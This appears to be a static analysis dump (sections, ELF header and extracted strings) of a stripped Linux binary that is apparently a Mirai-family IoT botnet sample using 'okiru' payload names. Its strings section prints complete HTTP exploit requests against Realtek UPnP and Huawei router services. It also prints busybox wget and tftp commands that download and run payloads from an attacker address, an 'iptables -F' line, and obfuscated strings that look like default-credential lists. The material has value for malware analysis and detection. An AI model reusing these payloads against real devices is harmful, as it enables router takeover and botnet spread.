Missing bin header dwarf
[Sections]

nth paddr         size vaddr        vsize perm name
―――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000000     0x0 0x00000000     0x0 ---- 
1   0x00000094    0x1c 0x08048094    0x1c -r-x .init
2   0x000000b0  0x8fa1 0x080480b0  0x8fa1 -r-x .text
3   0x00009051    0x17 0x08051051    0x17 -r-x .fini
4   0x00009080  0x28fc 0x08051080  0x28fc -r-- .rodata
5   0x0000c000     0x8 0x08054000     0x8 -rw- .ctors
6   0x0000c008     0x8 0x08054008     0x8 -rw- .dtors
7   0x0000c020   0x1c0 0x08054020   0x1c0 -rw- .data
8   0x0000c1e0     0x0 0x080541e0  0x24e0 -rw- .bss
9   0x0000c1e0    0x3e 0x00000000    0x3e ---- .shstrtab

[Segments]

nth paddr         size vaddr        vsize perm name
―――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000000  0xb97c 0x08048000  0xb97c -r-x LOAD0
1   0x0000c000   0x1e0 0x08054000  0x26c0 -rw- LOAD1
2   0x00000000     0x0 0x00000000     0x0 -rw- GNU_STACK
3   0x00000000    0x34 0x08048000    0x34 -rw- ehdr

[Entrypoints]
vaddr=0x08048168 paddr=0x00000168 haddr=0x00000018 hvaddr=0x08048018 type=program

1 entrypoints
[Constructors]

0 entrypoints
[Main]
vaddr=0x0804af31 paddr=0x00002f31
[Imports]
nth vaddr bind type lib name
――――――――――――――――――――――――――――

[Symbols]

nth paddr vaddr bind type size lib name
―――――――――――――――――――――――――――――――――――――――
[Strings]
nth paddr      vaddr      len size section type    string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00009080 0x08051080 16  17   .rodata ascii   /etc/resolv.conf
1   0x00009091 0x08051091 11  12   .rodata ascii   nameserver 
2   0x0000909f 0x0805109f 20  21   .rodata ascii   ttwiq`d?fm2wn0j5?w\a\a
3   0x000090b4 0x080510b4 22  23   .rodata ascii   7fs20?uee3fowmk}id}3\a\a
4   0x000090cb 0x080510cb 7   8    .rodata ascii   (wuhd(\a
5   0x000090d3 0x080510d3 6   7    .rodata ascii   (jfwt\a
6   0x000090da 0x080510da 14  15   .rodata ascii   (wuhd(ibs(sdw\a
7   0x000090e9 0x080510e9 4   5    .rodata ascii   (ac\a
8   0x000090ee 0x080510ee 17  18   .rodata ascii   ?6d31741?6d31741\a
9   0x00009100 0x08051100 10  11   .rodata ascii   cquObkwbu\a
10  0x0000910b 0x0805110b 8   9    .rodata ascii   ardlcqu\a
11  0x00009117 0x08051117 10  11   .rodata ascii   rtpftobub\a
12  0x00009122 0x08051122 11  12   .rodata ascii   en`ehsWbni\a
13  0x0000912e 0x0805112e 15  16   .rodata ascii   WHTS'(dci*d`n(\a
14  0x0000913e 0x0805113e 10  11   .rodata ascii   cqudbkwbu\a
15  0x00009149 0x08051149 7   8    .rodata ascii   vpbftc}
16  0x00009154 0x08051154 23  24   .rodata ascii   fedcba`onmlkjihw765432\a
17  0x0000916c 0x0805116c 33  34   .rodata ascii   fedcba`onmlkjihwvutsrqp76543210?\a
18  0x0000918e 0x0805118e 23  24   .rodata ascii   4mw6hflnk3b5icde2joa`7\a
19  0x000091a6 0x080511a6 8   9    .rodata ascii   m20-!mB\a
20  0x000091af 0x080511af 8   9    .rodata ascii   bkaKhfc\a
21  0x000091b8 0x080511b8 23  24   .rodata ascii   6`dfe3chj42oiw5kbn7mla\a
22  0x000091d0 0x080511d0 7   8    .rodata ascii   bifekb\a
23  0x000091d8 0x080511d8 7   8    .rodata ascii   t~tsbj\a
24  0x000091e0 0x080511e0 6   7    .rodata ascii   tobkk\a
25  0x000091eb 0x080511eb 11  12   .rodata ascii   (eni(ert~eh
26  0x000091f7 0x080511f7 7   8    .rodata ascii   'HLNUR\a
27  0x000091ff 0x080511ff 9   10   .rodata ascii   ='fwwkbs\a
28  0x00009209 0x08051209 22  23   .rodata ascii   `bs='fwwkbs'ihs'ahric\a
29  0x00009220 0x08051220 22  23   .rodata ascii   asw='fwwkbs'ihs'ahric\a
30  0x00009237 0x08051237 22  23   .rodata ascii   doh='fwwkbs'ihs'ahric\a
31  0x00009256 0x08051256 15  16   .rodata ascii   O@^VF='fwwkbs\a\a
32  0x00009266 0x08051266 9   10   .rodata ascii   BDOHCHIB\a
33  0x00009270 0x08051270 11  12   .rodata ascii   (eni(ert~eh
34  0x0000927c 0x0805127c 16  17   .rodata ascii   'dfs'(eni(ert~eh
35  0x0000928d 0x0805128d 32  33   .rodata ascii   '{{'ponkb'ubfc'n<'ch'(eni(ert~eh
36  0x000092ae 0x080512ae 26  27   .rodata ascii   'bdoh'<'chib';'(eni(ert~eh
37  0x000092c9 0x080512c9 15  16   .rodata ascii   '{{'(eni(ert~eh
38  0x000092d9 0x080512d9 18  19   .rodata ascii   'cc'na:(eni(ert~eh
39  0x000092ec 0x080512ec 15  16   .rodata ascii   'et:55'dhris:6\a
40  0x000092fc 0x080512fc 11  12   .rodata ascii   (eni(ert~eh
41  0x00009308 0x08051308 18  19   .rodata ascii   'p`bs<'(eni(ert~eh
42  0x0000931b 0x0805131b 18  19   .rodata ascii   'sasw<'(eni(ert~eh
43  0x0000932e 0x0805132e 7   8    .rodata ascii   'O@^VF\a
44  0x00009336 0x08051336 24  25   .rodata ascii   dhisuhk)fkjftohtsni`)ur\a
45  0x0000934f 0x0805134f 23  24   .rodata ascii   ibsphul)en`ehswbni)dhj\a
46  0x00009367 0x08051367 12  13   .rodata ascii   (wuhd(tbka(b
47  0x0000937b 0x0805137b 4   5    .rodata ascii   /dev
48  0x00009392 0x08051392 4   5    .rodata ascii   m68k
49  0x00009397 0x08051397 4   5    .rodata ascii   mips
50  0x0000939c 0x0805139c 6   7    .rodata ascii   mipsel
51  0x000093a3 0x080513a3 5   6    .rodata ascii   sparc
52  0x000093a9 0x080513a9 7   8    .rodata ascii   powerpc
53  0x000093b1 0x080513b1 6   7    .rodata ascii   x86_64
54  0x000093b8 0x080513b8 6   7    .rodata ascii   superh
55  0x000093bf 0x080513bf 7   8    .rodata ascii   fvrfunh
56  0x000093c7 0x080513c7 4   5    .rodata ascii   uhhs
57  0x000093cd 0x080513cd 5   6    .rodata ascii   d4266
58  0x000093d3 0x080513d3 8   9    .rodata ascii   577?7?51
59  0x000093dc 0x080513dc 8   9    .rodata ascii   fobs}nw?
60  0x000093e5 0x080513e5 6   7    .rodata ascii   fistkv
61  0x000093ec 0x080513ec 8   9    .rodata ascii   oris202>
62  0x000093f5 0x080513f5 6   7    .rodata ascii   fkwnib
63  0x000093fc 0x080513fc 8   9    .rodata ascii   6776doni
64  0x00009409 0x08051409 12  13   .rodata ascii   nwdfjXus2427
65  0x00009416 0x08051416 6   7    .rodata ascii   654654
66  0x0000941d 0x0805141d 8   9    .rodata ascii   6543vpbu
67  0x0000942a 0x0805142a 6   7    .rodata ascii   hbknir
68  0x00009435 0x08051435 6   7    .rodata ascii   hbknir
69  0x0000943c 0x0805143c 4   5    .rodata ascii   6543
70  0x00009441 0x08051441 5   6    .rodata ascii   nqcbq
71  0x00009447 0x08051447 5   6    .rodata ascii   ssibs
72  0x0000944d 0x0805144d 8   9    .rodata ascii   65436543
73  0x00009456 0x08051456 9   10   .rodata ascii   oh3rlr1fs
74  0x00009460 0x08051460 6   7    .rodata ascii   t~tsbj
75  0x00009467 0x08051467 5   6    .rodata ascii   kni`f
76  0x0000946d 0x0805146d 4   5    .rodata ascii   fcab
77  0x00009474 0x08051474 9   10   .rodata ascii   nitsfkkbu
78  0x0000947e 0x0805147e 6   7    .rodata ascii   41505>
79  0x00009485 0x08051485 8   9    .rodata ascii   iB0mF"2j
80  0x0000948e 0x0805148e 12  13   .rodata ascii   sbkbdhjfcjni
81  0x0000949b 0x0805149b 14  15   .rodata ascii   s7sfkd7isu7k3&
82  0x000094aa 0x080514aa 6   7    .rodata ascii   @J?6?5
83  0x000094b1 0x080514b1 8   9    .rodata ascii   }~fc6543
84  0x000094ba 0x080514ba 10  11   .rodata ascii   6543210?>7
85  0x000094c5 0x080514c5 4   5    .rodata ascii   6>??
86  0x000094ca 0x080514ca 5   6    .rodata ascii   }ohi`
87  0x000094d4 0x080514d4 7   8    .rodata ascii   dfs675>
88  0x000094dc 0x080514dc 6   7    .rodata ascii   cfbjhi
89  0x000094ea 0x080514ea 5   6    .rodata ascii   qbusb
90  0x000094f0 0x080514f0 10  11   .rodata ascii   52blslt654
91  0x000094fb 0x080514fb 8   9    .rodata ascii   }tri66??
92  0x00009504 0x08051504 5   6    .rodata ascii   65432
93  0x0000950a 0x0805150a 6   7    .rodata ascii   654321
94  0x00009511 0x08051511 6   7    .rodata ascii   ??????
95  0x00009519 0x08051519 6   7    .rodata ascii   jocnwd
96  0x00009520 0x08051520 8   9    .rodata ascii   mrfisbdo
97  0x0000952d 0x0805152d 5   6    .rodata ascii   23456
98  0x00009533 0x08051533 8   9    .rodata ascii   tjdfcjni
99  0x0000953c 0x0805153c 6   7    .rodata ascii   111111
100 0x00009543 0x08051543 6   7    .rodata ascii   lkq654
101 0x0000954a 0x0805154a 7   8    .rodata ascii   lkq6543
102 0x00009552 0x08051552 6   7    .rodata ascii   ]sb256
103 0x00009559 0x08051559 6   7    .rodata ascii   on426?
104 0x00009560 0x08051560 5   6    .rodata ascii   mqe}c
105 0x00009566 0x08051566 4   5    .rodata ascii   filh
106 0x00009571 0x08051571 9   10   .rodata ascii   ahricbu??
107 0x0000957b 0x0805157b 10  11   .rodata ascii   0rmJlh7qn}
108 0x00009588 0x08051588 12  13   .rodata ascii   0rmJlh7fcjni
109 0x00009595 0x08051595 4   5    .rodata ascii   nlpe
110 0x0000959a 0x0805159a 7   8    .rodata ascii   cubfjeh
111 0x000095a3 0x080515a3 7   8    .rodata ascii   ubfksbl
112 0x000095ab 0x080515ab 7   8    .rodata ascii   6666666
113 0x000095b3 0x080515b3 8   9    .rodata ascii   wfttphuc
114 0x000095bc 0x080515bc 7   8    .rodata ascii   cbafrks
115 0x000095c4 0x080515c4 4   5    .rodata ascii   wftt
116 0x000095c9 0x080515c9 8   9    .rodata ascii   77777777
117 0x000095d2 0x080515d2 4   5    .rodata ascii   rtbu
118 0x000095d7 0x080515d7 9   10   .rodata ascii   fcjni6543
119 0x000095e1 0x080515e1 6   7    .rodata ascii   fcjni6
120 0x000095e8 0x080515e8 13  14   .rodata ascii   fcjnintsufshu
121 0x000095f6 0x080515f6 6   7    .rodata ascii   sbkibs
122 0x000095fd 0x080515fd 7   8    .rodata ascii   trwwhus
123 0x00009605 0x08051605 5   6    .rodata ascii   `rbts
124 0x0000960b 0x0805160b 4   5    .rodata ascii   reis
125 0x00009610 0x08051610 7   8    .rodata ascii   tbuqndb
126 0x00009618 0x08051618 6   7    .rodata ascii   jbukni
127 0x0000961f 0x0805161f 6   7    .rodata ascii   j`4277
128 0x00009628 0x08051628 4   5    .rodata ascii   h`ni
129 0x0000962d 0x0805162d 7   8    .rodata ascii   tbuifjb
130 0x00009635 0x08051635 5   6    .rodata ascii   qucqt
131 0x0000963b 0x0805163b 6   7    .rodata ascii   ddhris
132 0x00009642 0x08051642 5   6    .rodata ascii   bisbu
133 0x00009648 0x08051648 5   6    .rodata ascii   rt~eh
134 0x0000964f 0x0805164f 9   10   .rodata ascii   rksn*dfkk
135 0x00009659 0x08051659 4   5    .rodata ascii   obkw
136 0x0000965e 0x0805165e 4   9    .rodata utf16le #$9y
137 0x00009667 0x08051667 5   6    .rodata ascii   qfknc
138 0x0000966d 0x0805166d 5   6    .rodata ascii   fnkbc
139 0x00009673 0x08051673 8   9    .rodata ascii   idhuubds
140 0x0000967c 0x0805167c 5   6    .rodata ascii   binbc
141 0x00009682 0x08051682 4   5    .rodata ascii   uuhu
142 0x00009687 0x08051687 6   7    .rodata ascii   hhce~b
143 0x00009699 0x08051699 4   5    .rodata ascii   \x%x
144 0x000096a0 0x080516a0 18  19   .rodata ascii   >%s.file && cd %s\n
145 0x000096b3 0x080516b3 32  33   .rodata ascii   /bin/busybox rm -rf .file %s %s\n
146 0x000096d4 0x080516d4 12  13   .rodata ascii   iptables -F\n
147 0x000096e1 0x080516e1 105 106  .rodata ascii   /bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s\n
148 0x0000974b 0x0805174b 64  65   .rodata ascii   /bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s\n
149 0x0000978c 0x0805178c 107 108  .rodata ascii   /bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s\n
150 0x000097f8 0x080517f8 89  90   .rodata ascii   /bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s\n
151 0x00009855 0x08051855 93  94   .rodata ascii   /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'\n
152 0x000098b3 0x080518b3 89  90   .rodata ascii   /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'\n
153 0x0000990d 0x0805190d 26  27   .rodata ascii   ./%s > %s; ./%s; >%s; >%s\n
154 0x00009928 0x08051928 843 844  .rodata ascii   POST /picdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 603\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var/;cp $SHELL c;>c`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
155 0x00009c74 0x08051c74 868 869  .rodata ascii   POST /picdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var/;wget http://%d.%d.%d.%d/rt.mips -O -> c`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
156 0x00009fd9 0x08051fd9 842 843  .rodata ascii   POST /picdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 602\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;chmod +x c;./c`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
157 0x0000a324 0x08052324 869 870  .rodata ascii   POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nUser-Agent: Hello-World\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?>\r\n    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\r\n    <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">\r\n    <NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>\r\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\r\n</u:Upgrade>\r\n    </s:Body>\r\n    </s:Envelope>\r\n\r\n
158 0x0000a68e 0x0805268e 14  15   .rodata ascii   /dev/netslink/
159 0x0000a69d 0x0805269d 9   10   .rodata ascii   /var/tmp/
160 0x0000a6a7 0x080526a7 5   6    .rodata ascii   /var/
161 0x0000a6ad 0x080526ad 6   7    .rodata ascii   /home/
162 0x0000a6b4 0x080526b4 9   10   .rodata ascii   /var/run/
163 0x0000a6c1 0x080526c1 5   6    .rodata ascii   /dev/
164 0x0000a6c7 0x080526c7 5   6    .rodata ascii   /mnt/
165 0x0000a6cd 0x080526cd 6   7    .rodata ascii   /boot/
166 0x0000a6d4 0x080526d4 9   10   .rodata ascii   /dev/shm/
167 0x0000a6de 0x080526de 5   6    .rodata ascii   /usr/
168 0x0000a6e4 0x080526e4 4   5    .rodata ascii   arm4
169 0x0000a6e9 0x080526e9 4   5    .rodata ascii   arm7
170 0x0000a707 0x08052707 9   10   .rodata ascii   \bwatchdog
171 0x0000a72c 0x0805272c 5   6    .rodata ascii   (nil)
172 0x0000a732 0x08052732 6   7    .rodata ascii   (null)
173 0x0000a748 0x08052748 12  13   .rodata ascii   \b\n\n\nhlLjztqZ
174 0x0000a789 0x08052789 20  21   .rodata ascii   npxXoudifFeEgGaACScs
175 0x0000a79e 0x0805279e 7   8    .rodata ascii    +0-#'I
176 0x0000a7ca 0x080527ca 14  15   .rodata ascii   Unknown error 
177 0x0000a7e0 0x080527e0 7   8    .rodata ascii   Success
178 0x0000a7e8 0x080527e8 23  24   .rodata ascii   Operation not permitted
179 0x0000a800 0x08052800 25  26   .rodata ascii   No such file or directory
180 0x0000a81a 0x0805281a 15  16   .rodata ascii   No such process
181 0x0000a82a 0x0805282a 23  24   .rodata ascii   Interrupted system call
182 0x0000a842 0x08052842 18  19   .rodata ascii   Input/output error
183 0x0000a855 0x08052855 25  26   .rodata ascii   No such device or address
184 0x0000a86f 0x0805286f 22  23   .rodata ascii   Argument list too long
185 0x0000a886 0x08052886 17  18   .rodata ascii   Exec format error
186 0x0000a898 0x08052898 19  20   .rodata ascii   Bad file descriptor
187 0x0000a8ac 0x080528ac 18  19   .rodata ascii   No child processes
188 0x0000a8bf 0x080528bf 32  33   .rodata ascii   Resource temporarily unavailable
189 0x0000a8e0 0x080528e0 22  23   .rodata ascii   Cannot allocate memory
190 0x0000a8f7 0x080528f7 17  18   .rodata ascii   Permission denied
191 0x0000a909 0x08052909 11  12   .rodata ascii   Bad address
192 0x0000a915 0x08052915 21  22   .rodata ascii   Block device required
193 0x0000a92b 0x0805292b 23  24   .rodata ascii   Device or resource busy
194 0x0000a943 0x08052943 11  12   .rodata ascii   File exists
195 0x0000a94f 0x0805294f 25  26   .rodata ascii   Invalid cross-device link
196 0x0000a969 0x08052969 14  15   .rodata ascii   No such device
197 0x0000a978 0x08052978 15  16   .rodata ascii   Not a directory
198 0x0000a988 0x08052988 14  15   .rodata ascii   Is a directory
199 0x0000a997 0x08052997 16  17   .rodata ascii   Invalid argument
200 0x0000a9a8 0x080529a8 29  30   .rodata ascii   Too many open files in system
201 0x0000a9c6 0x080529c6 19  20   .rodata ascii   Too many open files
202 0x0000a9da 0x080529da 30  31   .rodata ascii   Inappropriate ioctl for device
203 0x0000a9f9 0x080529f9 14  15   .rodata ascii   Text file busy
204 0x0000aa08 0x08052a08 14  15   .rodata ascii   File too large
205 0x0000aa17 0x08052a17 23  24   .rodata ascii   No space left on device
206 0x0000aa2f 0x08052a2f 12  13   .rodata ascii   Illegal seek
207 0x0000aa3c 0x08052a3c 21  22   .rodata ascii   Read-only file system
208 0x0000aa52 0x08052a52 14  15   .rodata ascii   Too many links
209 0x0000aa61 0x08052a61 11  12   .rodata ascii   Broken pipe
210 0x0000aa6d 0x08052a6d 32  33   .rodata ascii   Numerical argument out of domain
211 0x0000aa8e 0x08052a8e 29  30   .rodata ascii   Numerical result out of range
212 0x0000aaac 0x08052aac 25  26   .rodata ascii   Resource deadlock avoided
213 0x0000aac6 0x08052ac6 18  19   .rodata ascii   File name too long
214 0x0000aad9 0x08052ad9 18  19   .rodata ascii   No locks available
215 0x0000aaec 0x08052aec 24  25   .rodata ascii   Function not implemented
216 0x0000ab05 0x08052b05 19  20   .rodata ascii   Directory not empty
217 0x0000ab19 0x08052b19 33  34   .rodata ascii   Too many levels of symbolic links
218 0x0000ab3c 0x08052b3c 26  27   .rodata ascii   No message of desired type
219 0x0000ab57 0x08052b57 18  19   .rodata ascii   Identifier removed
220 0x0000ab6a 0x08052b6a 27  28   .rodata ascii   Channel number out of range
221 0x0000ab86 0x08052b86 24  25   .rodata ascii   Level 2 not synchronized
222 0x0000ab9f 0x08052b9f 14  15   .rodata ascii   Level 3 halted
223 0x0000abae 0x08052bae 13  14   .rodata ascii   Level 3 reset
224 0x0000abbc 0x08052bbc 24  25   .rodata ascii   Link number out of range
225 0x0000abd5 0x08052bd5 28  29   .rodata ascii   Protocol driver not attached
226 0x0000abf2 0x08052bf2 26  27   .rodata ascii   No CSI structure available
227 0x0000ac0d 0x08052c0d 14  15   .rodata ascii   Level 2 halted
228 0x0000ac1c 0x08052c1c 16  17   .rodata ascii   Invalid exchange
229 0x0000ac2d 0x08052c2d 26  27   .rodata ascii   Invalid request descriptor
230 0x0000ac48 0x08052c48 13  14   .rodata ascii   Exchange full
231 0x0000ac56 0x08052c56 8   9    .rodata ascii   No anode
232 0x0000ac5f 0x08052c5f 20  21   .rodata ascii   Invalid request code
233 0x0000ac74 0x08052c74 12  13   .rodata ascii   Invalid slot
234 0x0000ac82 0x08052c82 20  21   .rodata ascii   Bad font file format
235 0x0000ac97 0x08052c97 19  20   .rodata ascii   Device not a stream
236 0x0000acab 0x08052cab 17  18   .rodata ascii   No data available
237 0x0000acbd 0x08052cbd 13  14   .rodata ascii   Timer expired
238 0x0000accb 0x08052ccb 24  25   .rodata ascii   Out of streams resources
239 0x0000ace4 0x08052ce4 29  30   .rodata ascii   Machine is not on the network
240 0x0000ad02 0x08052d02 21  22   .rodata ascii   Package not installed
241 0x0000ad18 0x08052d18 16  17   .rodata ascii   Object is remote
242 0x0000ad29 0x08052d29 21  22   .rodata ascii   Link has been severed
243 0x0000ad3f 0x08052d3f 15  16   .rodata ascii   Advertise error
244 0x0000ad4f 0x08052d4f 13  14   .rodata ascii   Srmount error
245 0x0000ad5d 0x08052d5d 27  28   .rodata ascii   Communication error on send
246 0x0000ad79 0x08052d79 14  15   .rodata ascii   Protocol error
247 0x0000ad88 0x08052d88 18  19   .rodata ascii   Multihop attempted
248 0x0000ad9b 0x08052d9b 18  19   .rodata ascii   RFS specific error
249 0x0000adae 0x08052dae 11  12   .rodata ascii   Bad message
250 0x0000adba 0x08052dba 37  38   .rodata ascii   Value too large for defined data type
251 0x0000ade0 0x08052de0 26  27   .rodata ascii   Name not unique on network
252 0x0000adfb 0x08052dfb 28  29   .rodata ascii   File descriptor in bad state
253 0x0000ae18 0x08052e18 22  23   .rodata ascii   Remote address changed
254 0x0000ae2f 0x08052e2f 38  39   .rodata ascii   Can not access a needed shared library
255 0x0000ae56 0x08052e56 36  37   .rodata ascii   Accessing a corrupted shared library
256 0x0000ae7b 0x08052e7b 31  32   .rodata ascii   .lib section in a.out corrupted
257 0x0000ae9b 0x08052e9b 47  48   .rodata ascii   Attempting to link in too many shared libraries
258 0x0000aecb 0x08052ecb 37  38   .rodata ascii   Cannot exec a shared library directly
259 0x0000aef1 0x08052ef1 49  50   .rodata ascii   Invalid or incomplete multibyte or wide character
260 0x0000af23 0x08052f23 43  44   .rodata ascii   Interrupted system call should be restarted
261 0x0000af4f 0x08052f4f 18  19   .rodata ascii   Streams pipe error
262 0x0000af62 0x08052f62 14  15   .rodata ascii   Too many users
263 0x0000af71 0x08052f71 30  31   .rodata ascii   Socket operation on non-socket
264 0x0000af90 0x08052f90 28  29   .rodata ascii   Destination address required
265 0x0000afad 0x08052fad 16  17   .rodata ascii   Message too long
266 0x0000afbe 0x08052fbe 30  31   .rodata ascii   Protocol wrong type for socket
267 0x0000afdd 0x08052fdd 22  23   .rodata ascii   Protocol not available
268 0x0000aff4 0x08052ff4 22  23   .rodata ascii   Protocol not supported
269 0x0000b00b 0x0805300b 25  26   .rodata ascii   Socket type not supported
270 0x0000b025 0x08053025 23  24   .rodata ascii   Operation not supported
271 0x0000b03d 0x0805303d 29  30   .rodata ascii   Protocol family not supported
272 0x0000b05b 0x0805305b 40  41   .rodata ascii   Address family not supported by protocol
273 0x0000b084 0x08053084 22  23   .rodata ascii   Address already in use
274 0x0000b09b 0x0805309b 31  32   .rodata ascii   Cannot assign requested address
275 0x0000b0bb 0x080530bb 15  16   .rodata ascii   Network is down
276 0x0000b0cb 0x080530cb 22  23   .rodata ascii   Network is unreachable
277 0x0000b0e2 0x080530e2 35  36   .rodata ascii   Network dropped connection on reset
278 0x0000b106 0x08053106 32  33   .rodata ascii   Software caused connection abort
279 0x0000b127 0x08053127 24  25   .rodata ascii   Connection reset by peer
280 0x0000b140 0x08053140 25  26   .rodata ascii   No buffer space available
281 0x0000b15a 0x0805315a 39  40   .rodata ascii   Transport endpoint is already connected
282 0x0000b182 0x08053182 35  36   .rodata ascii   Transport endpoint is not connected
283 0x0000b1a6 0x080531a6 45  46   .rodata ascii   Cannot send after transport endpoint shutdown
284 0x0000b1d4 0x080531d4 34  35   .rodata ascii   Too many references: cannot splice
285 0x0000b1f7 0x080531f7 20  21   .rodata ascii   Connection timed out
286 0x0000b20c 0x0805320c 18  19   .rodata ascii   Connection refused
287 0x0000b21f 0x0805321f 12  13   .rodata ascii   Host is down
288 0x0000b22c 0x0805322c 16  17   .rodata ascii   No route to host
289 0x0000b23d 0x0805323d 29  30   .rodata ascii   Operation already in progress
290 0x0000b25b 0x0805325b 25  26   .rodata ascii   Operation now in progress
291 0x0000b275 0x08053275 21  22   .rodata ascii   Stale NFS file handle
292 0x0000b28b 0x0805328b 24  25   .rodata ascii   Structure needs cleaning
293 0x0000b2a4 0x080532a4 27  28   .rodata ascii   Not a XENIX named type file
294 0x0000b2c0 0x080532c0 29  30   .rodata ascii   No XENIX semaphores available
295 0x0000b2de 0x080532de 20  21   .rodata ascii   Is a named type file
296 0x0000b2f3 0x080532f3 16  17   .rodata ascii   Remote I/O error
297 0x0000b304 0x08053304 19  20   .rodata ascii   Disk quota exceeded
298 0x0000b318 0x08053318 15  16   .rodata ascii   No medium found
299 0x0000b328 0x08053328 17  18   .rodata ascii   Wrong medium type
300 0x0000b593 0x08053593 10  11   .rodata ascii   \b/dev/null
301 0x0000b8a7 0x080538a7 5   6    .rodata ascii   L(knN
302 0x0000b8ae 0x080538ae 5   6    .rodata ascii    Ainf
0   0x0000c040 0x08054040 36  37   .data   ascii   cz2isg9l8u7b5xw0mr6jhfvpkteyo3nadq14
arch     x86
baddr    0x8048000
binsz    49632
bintype  elf
bits     32
canary   false
class    ELF32
crypto   false
endian   little
havecode true
laddr    0x0
lang     c
linenum  false
lsyms    false
machine  Intel 80386
nx       true
os       linux
pic      false
relocs   false
rpath    NONE
sanitize false
static   true
stripped true
subsys   linux
va       true
0x00000000  ELF MAGIC   0x464c457f
0x00000010  Type        0x0002
0x00000012  Machine     0x0003
0x00000014  Version     0x00000001
0x00000018  Entrypoint  0x08048168
0x0000001c  PhOff       0x00000034
0x00000020  ShOff       0x0000c220
0x00000024  Flags       0x00000000
0x00000028  EhSize      52
0x0000002a  PhentSize   32
0x0000002c  PhNum       3
0x0000002e  ShentSize   40
0x00000030  ShNum       10
0x00000032  ShrStrndx   9
[Linked libraries]

0 library
[Relocations]

vaddr paddr type name
―――――――――――――――――――――


0 relocations
49632
Section to Segment mapping:
Segment   Section
-----------------
LOAD0     .init .text .fini .rodata 
LOAD1     .ctors .dtors .data .bss 
GNU_STACK 
ehdr      


